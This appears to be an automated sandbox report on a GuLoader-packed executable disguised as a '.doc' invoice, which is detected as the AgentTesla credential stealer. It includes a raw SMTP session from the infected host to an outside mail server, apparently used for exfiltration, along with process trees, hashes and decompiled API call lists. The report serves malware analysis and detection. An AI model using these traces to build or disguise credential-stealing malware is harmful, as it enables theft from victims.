2021-10-13 11:06:38 UTC	221	IN	Data Raw: e9 e0 ec 5b 87 7a f3 9c d7 83 ff c1 ec 2e 16 bb b6 b5 a7 b3 88 5f 33 8a 76 16 20 85 fc 8c e5 20 b4 90 5f 05 de 3a b7 f8 85 03 21 55 44 2a c5 ae 0f 34 53 18 32 1c 91 38 b7 e0 97 23 4f 51 50 b7 81 d7 a0 9c 1c f9 cb af 95 05 f6 99 9f 0b 43 82 06 1b 1e f4 ec 0e 86 1b 39 25 f3 52 73 e3 6b 0f 42 8a fa 1f 75 65 ba 65 e8 16 58 c7 65 46 d3 92 51 18 b3 b9 96 f1 5a e5 fd ce ed 4e 0a 8f a6 8a 48 fb 55 3f 90 37 d5 e5 4c c0 6c ae ba 39 c8 9c 5b 8b 10 e1 24 db 39 e1 61 2b 15 60 31 2a 98 3b 99 c8 c9 63 54 a3 a8 bb 42 c9 14 ad 78 23 0c df 68 31 bf 32 3f 69 fa ef 75 47 2c 9c a3 4c d2 23 c0 96 77 cf 3c 09 6d ae d5 f5 77 ea 0c 84 86 8d 55 00 2f e2 ac 10 b3 80 a3 42 78 fd bd 1a 63 e3 6a b9 02 d5 96 86 6e 82 38 83 f6 b2 52 2e f6 7a eb 4c ad 05 d0 99 5a 8f e3 f8 bc f1 cb ee 21 Data Ascii: [z._3v _:!UD4S28#OQPC9%RskBueeXeFQZNHU?7Ll9[$9a+`1;cTBx#h12?iuG,L#w<mwU/Bxcjn8R.zLZ!

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Oct 13, 2021 13:08:14.545202971 CEST	587	49768	188.93.227.195	192.168.11.20	220-iberweb-11a.ibername.com ESMTP Exim 4.94.2 #2 Wed, 13 Oct 2021 12:08:13 +0100 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 13, 2021 13:08:14.545799017 CEST	49768	587	192.168.11.20	188.93.227.195	EHLO 210979
Oct 13, 2021 13:08:14.596400023 CEST	587	49768	188.93.227.195	192.168.11.20	250-iberweb-11a.ibername.com Hello 210979 [102.129.143.96] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPE_CONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Oct 13, 2021 13:08:14.596693039 CEST	49768	587	192.168.11.20	188.93.227.195	STARTTLS
Oct 13, 2021 13:08:14.649461031 CEST	587	49768	188.93.227.195	192.168.11.20	220 TLS go ahead

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Fra FAC-ES101-2107-03806.doc.exe PID: 8172 Parent PID: 9052

General

Start time:	13:05:40
Start date:	13/10/2021
Path:	C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe'
Imagebase:	0x400000
File size:	102400 bytes
MD5 hash:	18B804E21A3C1C80C195E7D20DC38477
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1175708620.0000000002AB0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 2648 Parent PID: 8172

General

Start time:	13:06:08
Start date:	13/10/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe'
Imagebase:	0x70000
File size:	65440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: RegAsm.exe PID: 2792 Parent PID: 8172

General

Start time:	13:06:09
Start date:	13/10/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe'
Imagebase:	0x4c0000
File size:	65440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: RegAsm.exe PID: 2796 Parent PID: 8172

General

Start time:	13:06:09
Start date:	13/10/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Fra FAC-ES101-2107-03806.doc.exe'
Imagebase:	0x8a0000
File size:	65440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.5639470864.000000001DD61000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000002.5639470864.000000001DD61000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 2880 Parent PID: 2796

General

Start time:	13:06:09
Start date:	13/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff689930000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Fra FAC-ES101-2107-03806.doc.exe PID: 8172 Parent PID: 9052 Fra FAC-ES101-2107-03806.doc.exeCOMMON

Executed Functions

Function 004133A0, Relevance: 321.6, APIs: 161, Strings: 22, Instructions: 1312COMMON

Download Yara Rule

APIs

#646.MSVBVM60(?), ref: 0041349F
__vbaStrMove.MSVBVM60 ref: 004134AD
__vbaStrCmp.MSVBVM60(rebninger,00000000), ref: 004134B9
__vbaFreeStr.MSVBVM60 ref: 004134CE
__vbaFreeVar.MSVBVM60 ref: 004134DA
__vbaNew2.MSVBVM60(00410ED8,004165D8), ref: 004134FB
__vbaHresultCheckObj.MSVBVM60(00000000,0299004C,00410EC8,00000014), ref: 00413523
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410EE8,000000B8), ref: 00413553
__vbaFreeObj.MSVBVM60 ref: 0041355F
#541.MSVBVM60(0000000A,15:15:15), ref: 00413571
__vbaStrVarMove.MSVBVM60(0000000A), ref: 0041357E
__vbaStrMove.MSVBVM60 ref: 00413589
__vbaFreeVar.MSVBVM60 ref: 00413595
__vbaNew2.MSVBVM60(00410ED8,004165D8), ref: 004135AD
__vbaHresultCheckObj.MSVBVM60(00000000,0299004C,00410EC8,00000014), ref: 004135D5
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410EE8,00000070), ref: 004135FF
__vbaFreeObj.MSVBVM60 ref: 0041360B
__vbaNew2.MSVBVM60(00410ED8,004165D8), ref: 00413623
__vbaHresultCheckObj.MSVBVM60(00000000,0299004C,00410EC8,0000001C), ref: 0041364B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410F30,00000060), ref: 004136B4
__vbaFreeObj.MSVBVM60 ref: 004136C0
__vbaStrToAnsi.MSVBVM60(?,MEG), ref: 004136D2
__vbaSetSystemError.MSVBVM60(00000000), ref: 004136E0
__vbaFreeStr.MSVBVM60 ref: 004136EC
__vbaNew2.MSVBVM60(00410ED8,004165D8), ref: 0041371A
__vbaHresultCheckObj.MSVBVM60(00000000,0299004C,00410EC8,00000014), ref: 00413742
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410EE8,00000068), ref: 0041376C
__vbaFreeObj.MSVBVM60 ref: 00413778
#610.MSVBVM60(0000000A), ref: 00413785
#552.MSVBVM60(?,0000000A,00000001), ref: 0041379B
__vbaVarMove.MSVBVM60 ref: 004137AD
__vbaFreeVar.MSVBVM60 ref: 004137B9
__vbaNew2.MSVBVM60(00410ED8,004165D8), ref: 004137D1
__vbaHresultCheckObj.MSVBVM60(00000000,0299004C,00410EC8,00000014), ref: 004137F9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410EE8,0000013C), ref: 00413868
__vbaFreeObj.MSVBVM60 ref: 00413874
__vbaLateMemCall.MSVBVM60(?,Ytf0FfwBKC98,00000003), ref: 00413903
__vbaSetSystemError.MSVBVM60(000BC9FA), ref: 00413918
#612.MSVBVM60(0000000A), ref: 00413931
__vbaStrVarMove.MSVBVM60(0000000A), ref: 0041393E
__vbaStrMove.MSVBVM60 ref: 00413952
__vbaFreeVar.MSVBVM60 ref: 0041395A
__vbaNew2.MSVBVM60(00410ED8,004165D8), ref: 00413973
__vbaHresultCheckObj.MSVBVM60(00000000,0299004C,00410EC8,00000014), ref: 004139A1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410EE8,00000110), ref: 004139D5
__vbaStrMove.MSVBVM60 ref: 004139EA
__vbaFreeObj.MSVBVM60 ref: 004139F8
__vbaNew2.MSVBVM60(00410ED8,004165D8), ref: 00413A0D
__vbaHresultCheckObj.MSVBVM60(00000000,0299004C,00410EC8,00000014), ref: 00413A35
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410EE8,00000108), ref: 00413A61
__vbaFreeObj.MSVBVM60 ref: 00413A69
__vbaNew2.MSVBVM60(00410ED8,004165D8), ref: 00413A7E
__vbaHresultCheckObj.MSVBVM60(00000000,0299004C,00410EC8,00000044), ref: 00413B7A
__vbaLateIdSt.MSVBVM60(?,00000000), ref: 00413BC3
__vbaFreeVar.MSVBVM60 ref: 00413BCF
__vbaStrToAnsi.MSVBVM60(?,finmekaniker), ref: 00413BE6
__vbaSetSystemError.MSVBVM60(00000000), ref: 00413BF4
__vbaFreeStr.MSVBVM60 ref: 00413C00
__vbaNew2.MSVBVM60(00410ED8,004165D8), ref: 00413C2E
__vbaHresultCheckObj.MSVBVM60(00000000,0299004C,00410EC8,00000014), ref: 00413C56
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410EE8,00000068), ref: 00413C80
__vbaFreeObj.MSVBVM60 ref: 00413C8C
#610.MSVBVM60(0000000A), ref: 00413C99
#552.MSVBVM60(?,0000000A,00000001), ref: 00413CAF
__vbaVarMove.MSVBVM60 ref: 00413CBE
__vbaFreeVar.MSVBVM60 ref: 00413CCA
__vbaNew2.MSVBVM60(00410ED8,004165D8), ref: 00413CE2
__vbaHresultCheckObj.MSVBVM60(00000000,0299004C,00410EC8,00000014), ref: 00413D0A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410EE8,0000013C), ref: 00413D79
__vbaFreeObj.MSVBVM60 ref: 00413D85
__vbaLateMemCall.MSVBVM60(?,iApzbb76Ji65,00000003), ref: 00413E11
__vbaSetSystemError.MSVBVM60(0059E365,00231721), ref: 00413E30
#702.MSVBVM60(0000000A,000000FF,000000FE,000000FE,000000FE), ref: 00413E65
__vbaStrMove.MSVBVM60 ref: 00413E79
__vbaFreeVar.MSVBVM60 ref: 00413E81
#611.MSVBVM60 ref: 00413E87
__vbaStrMove.MSVBVM60 ref: 00413E92
#610.MSVBVM60(00000002), ref: 00413E9B
#552.MSVBVM60(?,00000002,00000001), ref: 00413EB1
__vbaVarMove.MSVBVM60 ref: 00413EC0
__vbaFreeVar.MSVBVM60 ref: 00413ECC
_adj_fdiv_m64.MSVBVM60 ref: 00413EF5
__vbaFpI4.MSVBVM60(432A0000,?,43110000), ref: 00413F26
__vbaHresultCheckObj.MSVBVM60(00000000,00401150,004108E4,000002C0,?,43110000), ref: 00413F5A
__vbaStrCopy.MSVBVM60(?,43110000), ref: 00413F6B
__vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00413F79
__vbaSetSystemError.MSVBVM60(00707257,003ED390,?), ref: 00413F97
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00413FAD
__vbaNew2.MSVBVM60(00410ED8,004165D8), ref: 00413FDE
__vbaHresultCheckObj.MSVBVM60(00000000,0299004C,00410EC8,00000014), ref: 00414006
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410EE8,000000D8), ref: 00414036
__vbaStrMove.MSVBVM60 ref: 0041404B
__vbaFreeObj.MSVBVM60 ref: 00414057
__vbaNew2.MSVBVM60(00410ED8,004165D8), ref: 0041406F
__vbaHresultCheckObj.MSVBVM60(00000000,0299004C,00410EC8,00000014), ref: 00414097
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410EE8,000000F0), ref: 004140C7
__vbaStrMove.MSVBVM60 ref: 004140DF
__vbaFreeObj.MSVBVM60 ref: 004140EB
#610.MSVBVM60(0000000A), ref: 004140F8
#552.MSVBVM60(?,0000000A,00000001), ref: 0041410E
__vbaVarMove.MSVBVM60 ref: 00414120
__vbaFreeVar.MSVBVM60 ref: 0041412C
__vbaNew2.MSVBVM60(00410ED8,004165D8), ref: 00414144
__vbaHresultCheckObj.MSVBVM60(00000000,0299004C,00410EC8,0000001C), ref: 0041416C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410F30,00000064), ref: 00414198
__vbaFreeObj.MSVBVM60 ref: 004141A4
__vbaStrToAnsi.MSVBVM60(?,Undeviousness), ref: 004141BC
__vbaStrToAnsi.MSVBVM60(?,charbocle,00000000), ref: 004141CB
__vbaSetSystemError.MSVBVM60(00000000), ref: 004141D5
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004141EB
#594.MSVBVM60(0000000A), ref: 00414225
__vbaFreeVar.MSVBVM60 ref: 00414231
__vbaNew2.MSVBVM60(00410ED8,004165D8), ref: 00414249
__vbaHresultCheckObj.MSVBVM60(00000000,0299004C,00410EC8,00000014), ref: 00414277
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410EE8,000000B8), ref: 004142AB
__vbaFreeObj.MSVBVM60 ref: 004142B3
__vbaNew2.MSVBVM60(00410ED8,004165D8), ref: 004142CB
__vbaHresultCheckObj.MSVBVM60(00000000,0299004C,00410EC8,00000014), ref: 004142F3
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410EE8,000000E0), ref: 0041431F
__vbaStrMove.MSVBVM60 ref: 00414333
__vbaFreeObj.MSVBVM60 ref: 0041433F
__vbaNew2.MSVBVM60(00410ED8,004165D8), ref: 00414357
__vbaHresultCheckObj.MSVBVM60(00000000,0299004C,00410EC8,0000001C), ref: 0041437F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410F30,00000060), ref: 004143DF
__vbaFreeObj.MSVBVM60 ref: 004143EB
__vbaStrCopy.MSVBVM60 ref: 0041442C
__vbaHresultCheckObj.MSVBVM60(00000000,00401150,00410914,000006F8), ref: 00414465
__vbaFreeStr.MSVBVM60 ref: 00414477
__vbaStrCopy.MSVBVM60 ref: 00414498
__vbaHresultCheckObj.MSVBVM60(00000000,00401150,00410914,000006F8), ref: 004144D1
__vbaFreeStr.MSVBVM60 ref: 004144DD
__vbaStrCopy.MSVBVM60 ref: 004144FE
__vbaHresultCheckObj.MSVBVM60(00000000,00401150,00410914,000006F8), ref: 00414537
__vbaFreeStr.MSVBVM60 ref: 00414543
__vbaStrCopy.MSVBVM60 ref: 00414564
__vbaHresultCheckObj.MSVBVM60(00000000,00401150,00410914,000006F8), ref: 0041459D
__vbaFreeStr.MSVBVM60 ref: 004145A9
__vbaStrCopy.MSVBVM60 ref: 004145CA
__vbaHresultCheckObj.MSVBVM60(00000000,00401150,00410914,000006F8), ref: 00414603
__vbaFreeStr.MSVBVM60 ref: 0041460F
__vbaHresultCheckObj.MSVBVM60(00000000,00401150,004108E4,000002B4), ref: 0041462C
__vbaVarAdd.MSVBVM60(0000000A,?,?), ref: 0041466A
__vbaVarMove.MSVBVM60 ref: 00414671
#598.MSVBVM60 ref: 00414677
__vbaVarTstLt.MSVBVM60(00000002,?), ref: 00414698
__vbaFreeVar.MSVBVM60(00414771), ref: 00414702
__vbaFreeStr.MSVBVM60 ref: 0041470D
__vbaFreeStr.MSVBVM60 ref: 00414712
__vbaFreeObj.MSVBVM60 ref: 0041471D
__vbaFreeStr.MSVBVM60 ref: 00414722
__vbaFreeVar.MSVBVM60 ref: 00414727
__vbaFreeStr.MSVBVM60 ref: 0041472C
__vbaFreeVar.MSVBVM60 ref: 00414731
__vbaFreeObj.MSVBVM60 ref: 00414736
__vbaFreeStr.MSVBVM60 ref: 0041473E
__vbaFreeObj.MSVBVM60 ref: 00414746
__vbaFreeStr.MSVBVM60 ref: 0041474E
__vbaFreeStr.MSVBVM60 ref: 00414756

Strings

Organophone2, xrefs: 00414479
extralegal, xrefs: 00413D3A
iApzbb76Ji65, xrefs: 00413DF7
SEMIMALIGNANT, xrefs: 0041367B
Ytf0FfwBKC98, xrefs: 004138E6
Syndromerne5, xrefs: 00413DB8
CLAMATORES, xrefs: 004144DF
MEG, xrefs: 004136CC
problemsgende, xrefs: 004143AF
15:15:15, xrefs: 0041356B
Wrp, xrefs: 00413C08
Valutareservernes, xrefs: 0041440D
Crepey, xrefs: 004138A7
finmekaniker, xrefs: 00413BDE
GAARDES, xrefs: 00413ABA
Commutual, xrefs: 004145AB
liquidated, xrefs: 00413F60
Undeviousness, xrefs: 004141B6
rebninger, xrefs: 004134B4
charbocle, xrefs: 004141C5
Hypnotizabilities, xrefs: 00414545
Scopulousness, xrefs: 00413829

Memory Dump Source

Source File: 00000000.00000002.1173986101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1173955001.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1174112014.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1174144140.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$MoveNew2$CopyErrorSystem$Ansi$#552#610$Late$CallList$#541#594#598#611#612#646#702_adj_fdiv_m64
String ID: 15:15:15$CLAMATORES$Commutual$Crepey$GAARDES$Hypnotizabilities$MEG$Organophone2$SEMIMALIGNANT$Scopulousness$Syndromerne5$Undeviousness$Valutareservernes$Wrp$Ytf0FfwBKC98$charbocle$extralegal$finmekaniker$iApzbb76Ji65$liquidated$problemsgende$rebninger
API String ID: 2302085476-689379688
Opcode ID: 79d9ba20a04ffe715e059dda3e0e82f74a8f7bee04e18ce0dfd75af609f94ed7
Instruction ID: 1c304254fe2d28e1ca28c502bdada2c338b5c7042b73a952b7fcbb46b834d031
Opcode Fuzzy Hash: 79d9ba20a04ffe715e059dda3e0e82f74a8f7bee04e18ce0dfd75af609f94ed7
Instruction Fuzzy Hash: 77C27E70900219AFCB24DF24DD89BD9BBB5FB58301F1085AAE14EB72A0DB745AC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00401378, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6"*), ref: 0040137D

Strings

VB5!6"*, xrefs: 00401378

Memory Dump Source

Source File: 00000000.00000002.1173986101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1173955001.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1174112014.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1174144140.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6"*
API String ID: 1341478452-2992194029
Opcode ID: efa01524d1ce90f041e4a2a4286d13ef7a76f819ec84eaf4d32bdd3d30e97f44
Instruction ID: cf7f46a24b368f2ff2db7bd26f914864ab1aa1424bd4d67f6afc2004ee2fd92a
Opcode Fuzzy Hash: efa01524d1ce90f041e4a2a4286d13ef7a76f819ec84eaf4d32bdd3d30e97f44
Instruction Fuzzy Hash: 7C21C9A584E7D01FD70387759C246A23FB49B63228B4A02EBC1D5CF1F3D268488AC367

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401505, Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1173986101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1173955001.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1174112014.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1174144140.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
Instruction ID: d394a65342a6a254380257ba0734a19f866dc21ad068f5b1ddaac111a7468d93
Opcode Fuzzy Hash: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
Instruction Fuzzy Hash: F641279025E2D4EFC71B47B64CBA2813FE1AE07108B1A88EFD6D54B8A3E555241FC727

Uniqueness

Uniqueness Score: -1.00%

Function 00401741, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1173986101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1173955001.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1174112014.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1174144140.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
Instruction ID: 0ef76ab4ed2bcdf07a831812e9108315abc5032b0251afc9fc56c28be75d868b
Opcode Fuzzy Hash: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
Instruction Fuzzy Hash: 5E11DAB150E3E59FCB174B748CB52527FB0AF1B20070A44EBD4819F8A7E268281ED727

Uniqueness

Uniqueness Score: -1.00%

Function 004016F4, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1173986101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1173955001.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1174112014.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1174144140.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
Instruction ID: 3a4f40afd7daac755765d0dbc513794409bb1d663c47dbf88c845af7c1cdfe86
Opcode Fuzzy Hash: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
Instruction Fuzzy Hash: CBF07A70124154EFCB06CF74D8A5A063BE1AF5B3407451CDAD9108F475D736B865EB12

Uniqueness

Uniqueness Score: -1.00%

Function 00414990, Relevance: 56.2, APIs: 29, Strings: 3, Instructions: 212COMMON

Download Yara Rule

APIs

#693.MSVBVM60(00411174), ref: 004149DE
#535.MSVBVM60 ref: 004149EC
#593.MSVBVM60(?), ref: 00414A06
__vbaFreeVar.MSVBVM60 ref: 00414A11
__vbaNew2.MSVBVM60(00410ED8,004165D8), ref: 00414A29
__vbaHresultCheckObj.MSVBVM60(00000000,0299004C,00410EC8,00000014), ref: 00414A54
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410EE8,00000110), ref: 00414A82
__vbaStrMove.MSVBVM60 ref: 00414A91
__vbaFreeObj.MSVBVM60 ref: 00414AA0
__vbaVarDup.MSVBVM60 ref: 00414AB6
#666.MSVBVM60(?,0000000A), ref: 00414AC4
__vbaVarMove.MSVBVM60 ref: 00414AD0
__vbaFreeVar.MSVBVM60 ref: 00414AD9
#709.MSVBVM60(ABC,004111A4,000000FF,00000000), ref: 00414AFC
__vbaNew2.MSVBVM60(00410ED8,004165D8), ref: 00414B1D
__vbaHresultCheckObj.MSVBVM60(00000000,0299004C,00410EC8,00000014), ref: 00414B42
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410EE8,00000140), ref: 00414B68
__vbaFreeObj.MSVBVM60 ref: 00414B6D
#704.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 00414B89
__vbaStrMove.MSVBVM60 ref: 00414B94
__vbaFreeVar.MSVBVM60 ref: 00414B9D
__vbaNew2.MSVBVM60(00410ED8,004165D8), ref: 00414BB6
__vbaHresultCheckObj.MSVBVM60(00000000,0299004C,00410EC8,00000014), ref: 00414BDB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410EE8,00000070), ref: 00414BFB
__vbaFreeObj.MSVBVM60 ref: 00414C00
__vbaFileOpen.MSVBVM60(00000020,000000FF,000000D7,overmandende), ref: 00414C10
__vbaFreeStr.MSVBVM60(00414C6C), ref: 00414C5B
__vbaFreeStr.MSVBVM60 ref: 00414C60
__vbaFreeVar.MSVBVM60 ref: 00414C65

Strings

overmandende, xrefs: 00414C02
sandvaanere, xrefs: 00414AA8
ABC, xrefs: 00414AF7

Memory Dump Source

Source File: 00000000.00000002.1173986101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1173955001.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1174112014.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1174144140.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$MoveNew2$#535#593#666#693#704#709FileOpen
String ID: ABC$overmandende$sandvaanere
API String ID: 2783911502-2510946440
Opcode ID: 3066ff36288c8b16da0b8f94c2b84ae130f225b587c3b475b97300201a38975a
Instruction ID: 82345f0d992d447345c19e98a0b40ebf7f134c2c5fad931798f434525dd91ef9
Opcode Fuzzy Hash: 3066ff36288c8b16da0b8f94c2b84ae130f225b587c3b475b97300201a38975a
Instruction Fuzzy Hash: 4F817B70940219ABCB10DFA4DE48EDEBBB8FF48755F20412AF105B72E4DB745986CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00414EA0, Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 162COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00414EE8
#712.MSVBVM60(?,00411174,00000000,00000001,000000FF,00000000), ref: 00414EFD
__vbaStrMove.MSVBVM60 ref: 00414F0E
__vbaStrCmp.MSVBVM60(004111D8,?), ref: 00414F19
#541.MSVBVM60(?,21:21:21), ref: 00414F30
__vbaStrVarMove.MSVBVM60(?), ref: 00414F3A
__vbaStrMove.MSVBVM60 ref: 00414F45
__vbaFreeVar.MSVBVM60 ref: 00414F4A
__vbaNew2.MSVBVM60(00410ED8,004165D8), ref: 00414F62
__vbaHresultCheckObj.MSVBVM60(00000000,0299004C,00410EC8,00000014), ref: 00414F8D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410EE8,000000B8), ref: 00414FBB
__vbaFreeObj.MSVBVM60 ref: 00414FC0
#535.MSVBVM60 ref: 00414FC6
__vbaNew2.MSVBVM60(00410ED8,004165D8), ref: 00414FE0
__vbaHresultCheckObj.MSVBVM60(00000000,0299004C,00410EC8,0000001C), ref: 00415005
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410F30,00000064), ref: 00415027
__vbaFreeObj.MSVBVM60 ref: 0041502C
__vbaVarDup.MSVBVM60 ref: 00415046
#687.MSVBVM60(?,?), ref: 00415054
__vbaDateVar.MSVBVM60(?), ref: 0041505E
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00415070
__vbaFreeStr.MSVBVM60(004150AF), ref: 004150A7
__vbaFreeStr.MSVBVM60 ref: 004150AC

Strings

7/7/7, xrefs: 00415038
21:21:21, xrefs: 00414F2A
val, xrefs: 00414ECB

Memory Dump Source

Source File: 00000000.00000002.1173986101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1173955001.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1174112014.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1174144140.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$Move$New2$#535#541#687#712CopyDateList
String ID: 21:21:21$7/7/7$val
API String ID: 2692386279-935112925
Opcode ID: d920336204d3725ade39c3c1c21d7b1e6079f090d16a0c975f5dbe633f8bbe8e
Instruction ID: e1475fb1f93ef9a1ec82d9a1f67e7ee567fa347ab5fdaa20dfd5b926967bb147
Opcode Fuzzy Hash: d920336204d3725ade39c3c1c21d7b1e6079f090d16a0c975f5dbe633f8bbe8e
Instruction Fuzzy Hash: EE518E71900219EFCB00DFA4DD88EEEBBB9FB58705F10452AF505B72A4DB745889CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004147A0, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

#606.MSVBVM60(00000001,?), ref: 00414800
__vbaStrMove.MSVBVM60 ref: 0041480B
__vbaStrCmp.MSVBVM60(00411154,00000000), ref: 00414817
__vbaFreeStr.MSVBVM60 ref: 0041482A
__vbaFreeVar.MSVBVM60 ref: 00414839
#541.MSVBVM60(00000002,12:12:12), ref: 0041484D
__vbaStrVarMove.MSVBVM60(00000002), ref: 00414857
__vbaStrMove.MSVBVM60 ref: 00414862
__vbaFreeVar.MSVBVM60 ref: 0041486B
#648.MSVBVM60(00000002), ref: 0041487F
__vbaFreeVar.MSVBVM60 ref: 00414888
__vbaNew2.MSVBVM60(00410ED8,004165D8), ref: 0041489C
